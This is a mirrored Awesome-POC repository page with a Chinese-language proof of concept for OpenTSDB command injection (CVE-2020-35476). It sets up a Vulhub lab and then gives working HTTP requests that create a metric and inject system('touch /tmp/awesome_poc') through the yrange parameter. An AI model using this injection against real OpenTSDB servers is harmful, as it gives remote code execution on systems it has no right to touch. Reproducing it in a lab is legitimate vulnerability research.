admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/数据库漏洞/OpenTSDB 命令注入漏洞 CVE-2020-35476.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

78 lines
2.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# OpenTSDB 命令注入漏洞 CVE-2020-35476
## 漏洞描述
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。
参考链接:
- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051)
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)
## 环境搭建
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.0
```
docker compose up -d
```
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png)
## 漏洞复现
利用这个漏洞需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表:
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png)
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:
```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png)
如果目标 OpenTSDB 存在 metric且不为空则无需上述步骤。再次查看 metric 列表metric 已经创建完成:
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png)
发送如下数据包,其中参数`m`的值必须包含一个有数据的 metric
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png)
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:
![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png)
Reference in New Issue View Git Blame Copy Permalink